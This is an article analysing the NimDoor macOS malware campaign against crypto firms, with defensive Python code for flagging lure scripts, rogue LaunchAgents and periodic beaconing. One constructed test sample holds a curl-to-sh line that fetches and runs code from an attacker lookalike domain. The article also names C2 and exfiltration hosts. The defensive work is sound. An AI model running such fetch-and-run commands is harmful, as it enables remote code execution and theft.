NimDoor: North Korea’s Latest Cyber Exploit Targets Crypto

In April 2025, a wave of cyberattacks targeting Web3 and cryptocurrency businesses revealed a new weapon in the arsenal of North Korean threat actors: NimDoor, a macOS malware compiled in the Nim programming language.

Dissected in a detailed report by researchers at SentinelOne's SentinelLabs, the campaign showcases the Democratic People’s Republic of Korea’s (DPRK) evolving tactics: social engineering, novel persistence mechanisms and cross-platform tooling combined to infiltrate high-value targets.

The use of Nim, a less common programming language, alongside AppleScript and TLS-encrypted WebSocket command-and-control traffic, marks a shift towards more complex and stealthy operations.

Social Engineering: A Familiar Opening

The attack begins with a tried-and-tested DPRK tactic: impersonating a trusted contact via Telegram to lure victims into scheduling a meeting through Calendly. Victims then receive an email with a Zoom meeting link and instructions to run a fraudulent “Zoom SDK update script.” The script, hosted on attacker-controlled domains mimicking Zoom’s legitimate infrastructure (e.g., support.us05web-zoom[.]forum), is an AppleScript named *zoom_sdk_support.scpt*. It is padded with 10,000 lines of whitespace to push its real content out of sight of casual inspection, and it contains a typo, “Zook” instead of “Zoom”, that betrays the attackers’ carelessness and serves as a handy identifier for the lure.

The script fetches a second-stage payload from a command-and-control (C2) server, initiating the infection chain.
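The two traits the report describes for the lure script, heavy whitespace padding and Zoom-lookalike hosting, are both cheap to check automatically during triage. The Python below is an added example and not code from SentinelLabs, from the campaign, or from the real *zoom_sdk_support.scpt*; the sample script body is constructed here for illustration, and the lookalike rule (a hostname containing “zoom” whose registered domain is not zoom.us or zoom.com) is an assumption chosen for this example.

```python
import re
from urllib.parse import urlparse

# Legitimate Zoom apex domains. Assumption for this example; extend as needed.
LEGIT_ZOOM_APEX = {"zoom.us", "zoom.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def registered_domain(host: str) -> str:
    """Crude apex extraction: the last two labels (enough for the TLDs seen here)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def lookalike_zoom_hosts(text: str) -> list[str]:
    """Return hosts that trade on the Zoom name but are not under a Zoom apex domain."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if "zoom" in host and registered_domain(host) not in LEGIT_ZOOM_APEX:
            hosts.add(host)
    return sorted(hosts)


def padding_ratio(text: str) -> float:
    """Fraction of lines that are blank or whitespace-only."""
    lines = text.splitlines()
    if not lines:
        return 0.0
    blank = sum(1 for line in lines if not line.strip())
    return blank / len(lines)


def triage(text: str, pad_threshold: float = 0.9, min_lines: int = 1000) -> dict:
    """Flag a script that is mostly padding and/or reaches out to a Zoom lookalike."""
    ratio = padding_ratio(text)
    hosts = lookalike_zoom_hosts(text)
    reasons = []
    if ratio >= pad_threshold and len(text.splitlines()) > min_lines:
        reasons.append(f"whitespace padding: {ratio:.1%} of lines blank")
    if hosts:
        reasons.append("zoom lookalike host(s): " + ", ".join(hosts))
    return {
        "padding_ratio": ratio,
        "lookalike_hosts": hosts,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


# Constructed sample resembling the lure: a few lines of AppleScript, one genuine
# Zoom link, one lookalike URL (path invented), then thousands of blank lines.
SAMPLE = (
    'display dialog "Updating Zook SDK..."\n'
    'open location "https://us05web.zoom.us/j/000"\n'
    'do shell script "curl -s https://support.us05web-zoom.forum/update | sh"\n'
    + "\n" * 10000
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The genuine us05web.zoom.us link is deliberately left in the sample: a lure of this kind usually contains the real meeting URL as well, so the check must discriminate by registered domain rather than by the mere presence of the word “zoom”.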

NimDoor’s Technical Mastery

The campaign’s core innovation lies in its use of Nim-compiled binaries, still a rarity in macOS malware. Two primary Mach-O binaries, *a* and *installer*, are dropped into /private/var/tmp. The *a* binary, written in C++, deploys an encrypted payload called *netchk*. It uses PBKDF2 (Password-Based Key Derivation Function 2) with the password “gift123$%^” to derive the key that decrypts two embedded binaries: a benign *Target* binary and the malicious *trojan1_arm64*. The latter is injected into *Target* using a process injection technique that relies on specific macOS entitlements. The injected code communicates with a C2 server over a TLS-encrypted WebSocket (wss), a method uncommon in macOS malware, with JSON-formatted messages protected by multiple layers of RC4 encryption.

The *installer* binary, which is Nim-compiled, sets up persistence by creating a LaunchAgent at ~/Library/LaunchAgents/com.google.update.plist. It deploys two additional Nim binaries: *GoogIe LLC* (spelled with a capital “I” in place of the “l” to pass as Google) and *CoreKitAgent*. These ensure long-term access: *CoreKitAgent* runs a kqueue-based state machine and uses a novel persistence trick, installing handlers for SIGINT and SIGTERM (the signals sent when a user or the system tries to terminate the process) that redeploy its components, so simply killing the process does not remove the implant.
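The persistence described above leaves two things a defender can audit without any knowledge of the binaries themselves: a LaunchAgent whose label borrows a vendor namespace (com.google.) but whose program lives nowhere a Google installer would put it, and a homoglyph in the program name. The Python below is an added example, not code from SentinelLabs or from the malware. It assumes the expected install locations for Google-labelled agents and the example program path under ~/Library/Application Support (the report does not state where *GoogIe LLC* is written, so that path is an assumption); the sample plist is constructed here.

```python
import plistlib
import tempfile
from pathlib import Path

# Where a genuinely Google-labelled LaunchAgent is expected to run from.
# Assumption for this example; tune to your fleet's baseline.
VENDOR_EXPECTED_DIRS = {
    "com.google.": ("/Library/Google/", "/Applications/Google Chrome.app/"),
}
# Directories no legitimate persistent agent should execute from.
STAGING_DIRS = ("/private/var/tmp/", "/var/tmp/", "/tmp/")


def fold_homoglyphs(s: str) -> str:
    """Collapse characters commonly swapped in lookalike names: I/l/1 -> l, O/0 -> o."""
    return s.translate(str.maketrans("Il1O0", "llloo")).casefold()


def name_mimics(name: str, brand: str = "google") -> bool:
    """True when the brand appears only after homoglyph folding (e.g. 'GoogIe LLC')."""
    return brand.lower() not in name.lower() and fold_homoglyphs(brand) in fold_homoglyphs(name)


def audit_agent(label: str, program_args: list[str], brands=("google",)) -> list[str]:
    """Return a list of findings for one LaunchAgent (empty list means nothing odd)."""
    findings = []
    program = program_args[0] if program_args else ""
    if any(program.startswith(d) for d in STAGING_DIRS):
        findings.append(f"program runs from staging dir: {program}")
    for prefix, dirs in VENDOR_EXPECTED_DIRS.items():
        if label.startswith(prefix) and not any(program.startswith(d) for d in dirs):
            findings.append(f"label {label} claims vendor namespace but program is {program}")
    for brand in brands:
        if any(name_mimics(part, brand) for part in Path(program).parts):
            findings.append(f"homoglyph lookalike of '{brand}' in program path: {program}")
    return findings


def audit_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Parse every *.plist in a LaunchAgents directory and collect findings per file."""
    results = {}
    for plist_path in sorted(directory.glob("*.plist")):
        with plist_path.open("rb") as fh:
            data = plistlib.load(fh)
        label = data.get("Label", plist_path.stem)
        args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
        findings = audit_agent(label, args)
        if findings:
            results[plist_path.name] = findings
    return results


# Constructed sample plist mirroring the label the report describes. The program
# path is an assumption made for this example, not a path from the report.
SAMPLE_PROGRAM = "/Users/alice/Library/Application Support/GoogIe LLC/GoogIe LLC"
SAMPLE_PLIST = {
    "Label": "com.google.update",
    "ProgramArguments": [SAMPLE_PROGRAM],
    "RunAtLoad": True,
    "KeepAlive": True,
}


def write_sample_agent(directory: Path) -> Path:
    """Write the constructed plist where a real LaunchAgent would sit."""
    target = directory / "com.google.update.plist"
    with target.open("wb") as fh:
        plistlib.dump(SAMPLE_PLIST, fh)
    return target


def demo() -> dict[str, list[str]]:
    """Write the sample into a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agent(Path(tmp))
        return audit_launch_agents(Path(tmp))


if __name__ == "__main__":
    # On a real host, point this at Path.home() / "Library" / "LaunchAgents".
    for name, findings in demo().items():
        print(name)
        for f in findings:
            print("  -", f)
```

Two limits worth keeping in mind: the vendor baseline is the part that needs maintaining, since a Google agent installed via a non-standard path will produce a false positive, and the audit only sees agents registered through plists, so it will not catch a process that re-creates its plist from a signal handler unless the scan runs after the handler has fired.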

Data Theft With Precision

NimDoor’s data-stealing capabilities are executed via two Bash scripts, *upl* and *tlgrm*. The *upl* script collects browser data from Arc, Brave, Firefox, Chrome and Edge, as well as Keychain data and shell history files; these are compressed and exfiltrated to a C2 server at dataupload[.]store. The *tlgrm* script focuses on Telegram, taking its encrypted local database together with the key needed to decrypt it, so the contents can be recovered offline.

Both scripts use near-identical exfiltration functions, indicating a streamlined approach to data theft.

AppleScript As Beacon & Backdoor

A standout feature is the use of AppleScript as a lightweight beacon and backdoor. *CoreKitAgent* writes an AppleScript to ~/.ses whose strings are stored hex-encoded and decoded at runtime; the script collects the current timestamp, generates a unique ID, and beacons every 30 seconds to the C2 servers writeup[.]live or safeup[.]store. It reports the list of running processes and executes any commands it receives, blending into macOS’s native scripting environment to avoid detection.
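A fixed 30-second beacon is exactly the kind of regularity that stands out in proxy or DNS telemetry once connections are grouped by source and destination and the gaps between them are measured. The Python below is an added example of that check, not code from SentinelLabs or from the report; the log lines are constructed here (the source IP, the api.example.org noise host and the timestamps are invented), and the thresholds (at least eight intervals, coefficient of variation no more than 0.2) are assumptions chosen for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def parse_line(line: str) -> tuple[datetime, str, str]:
    """Parse the constructed log format: '<ISO-8601 UTC timestamp> <src> <dst_host>'."""
    ts, src, dst = line.split()
    stamp = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return stamp, src, dst


def find_beacons(lines, min_deltas: int = 8, max_cv: float = 0.2) -> dict:
    """Flag (src, dst) pairs whose inter-connection gaps are too regular to be human.

    Regularity is measured as the coefficient of variation of the gaps
    (population stdev divided by the median gap); a low value means a steady
    period even in the presence of small jitter.
    """
    by_pair = defaultdict(list)
    for line in lines:
        if line.strip():
            stamp, src, dst = parse_line(line)
            by_pair[(src, dst)].append(stamp)

    hits = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(deltas) < min_deltas:
            continue
        period = statistics.median(deltas)
        if period <= 0:
            continue
        cv = statistics.pstdev(deltas) / period
        if cv <= max_cv:
            hits[pair] = {"period_s": period, "cv": round(cv, 3), "count": len(stamps)}
    return hits


def constructed_log() -> list[str]:
    """Build sample telemetry: a 30 s beacon with +-1 s jitter plus irregular noise."""
    base = datetime(2025, 4, 14, 10, 0, tzinfo=timezone.utc)
    lines = []
    jitter = [0, 1, 0, -1]
    for i in range(21):
        t = base + timedelta(seconds=30 * i + jitter[i % 4])
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} 10.0.0.5 writeup.live")
    # Irregular, human-looking traffic to an unrelated host (constructed noise).
    for off in (0, 7, 95, 130, 131, 400, 1000, 1002, 1500, 1501, 2200):
        t = base + timedelta(seconds=off)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} 10.0.0.5 api.example.org")
    return lines


if __name__ == "__main__":
    for (src, dst), info in find_beacons(constructed_log()).items():
        print(f"{src} -> {dst}: period {info['period_s']}s, cv {info['cv']}, {info['count']} connections")
```

The median rather than the mean is used for the period so that a single long gap (a laptop lid closed for an hour) does not hide the beacon, and the check is deliberately destination-agnostic: it will find the 30-second cadence whether the host is writeup[.]live, safeup[.]store or a domain not yet on any indicator list.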

Why Nim?

The choice of Nim, a language known for its compile-time execution and cross-platform compatibility, reflects DPRK actors’ shift towards tools that complicate analysis. Unlike Go and Rust, both previously used by North Korean groups, Nim can interleave developer-written code with its own runtime at compile time, which obscures control flow and slows reverse engineers down.

Combined with macOS-specific features like AppleScript and signal handling, NimDoor demonstrates a calculated effort to exploit less-scrutinised technologies.

A Broader Campaign

SentinelLabs’ findings align with reports from Huntabil.IT and Huntress, which noted similar attack chains targeting Web3 firms. Parallel domains (e.g., support.us06web-zoom[.]online) suggest a broader campaign with URLs tailored to each victim. The infrastructure’s overlap with earlier DPRK operations, notably the reuse of fake Zoom domains, ties NimDoor to established tactics while showing fresh work in payload delivery and persistence.

Implications For Defenders

NimDoor’s complexity underscores the need for defenders to keep pace with emerging languages and techniques. Its use of wss command-and-control, process injection and signal-based persistence points to active development aimed at bypassing security controls.

SentinelLabs urges analysts to study Nim and similar languages, as their obscurity offers attackers an edge.

Indicators of compromise, including domains, file paths and binary hashes, are provided in the report to aid detection, but the campaign’s sophistication suggests DPRK actors will continue refining their tradecraft, posing an ongoing risk to high-value sectors such as cryptocurrency.

Image: Ideogram
